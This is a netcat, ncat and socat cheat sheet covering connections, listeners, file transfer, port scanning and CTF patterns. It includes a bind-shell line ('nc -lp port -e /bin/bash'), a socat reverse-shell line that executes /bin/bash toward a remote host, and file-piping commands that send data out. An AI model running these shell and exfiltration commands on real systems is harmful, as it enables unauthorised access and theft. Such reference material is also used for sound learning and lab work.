Netcat (nc) Quick Reference
===========================

BASIC CONNECTION
  nc host port                   Connect to host:port
  nc -v host port                Verbose connection
  nc -nv host port               No DNS, verbose

LISTENING
  nc -lp port                    Listen on port
  nc -lvp port                   Listen verbose
  nc -lp port -e /bin/bash       Bind shell (dangerous)

DATA TRANSFER
  # Send file
  nc -lp 4444 > received.txt                    (receiver)
  nc host 4444 < send.txt                       (sender)

  # Pipe command output
  echo "data" | nc host port
  cat file | nc host port

SCANNING
  nc -zv host 1-1000             Port scan
  nc -zvw1 host 80               Single port check (-w1 = 1s timeout)

OPTIONS
  -l                             Listen mode
  -p port                        Specify port
  -v                             Verbose
  -n                             No DNS resolution
  -w seconds                     Timeout
  -z                             Zero I/O (scan mode)
  -u                             UDP mode
  -e prog                        Execute program on connect
  -k                             Keep listening after disconnect

NCAT (enhanced netcat)
  ncat --ssl host port           SSL/TLS connection
  ncat -lp port --ssl            SSL listener
  ncat --proxy proxyhost:port host port    Via proxy

SOCAT (advanced)
  socat TCP:host:port -          Basic connect
  socat TCP-LISTEN:port -        Basic listen
  socat TCP:host:port EXEC:/bin/bash   Connect shell
  socat OPENSSL:host:443 -      SSL connect

COMMON CTF PATTERNS
  # Connect to challenge
  nc challenge.ctf.com 1337

  # Send payload
  python3 -c "print('A'*100)" | nc host port

  # Interactive + send file
  (cat payload; cat -) | nc host port

  # Receive then interact
  nc host port
  # type commands interactively

  # Redirect to file for analysis
  nc host port | tee output.txt
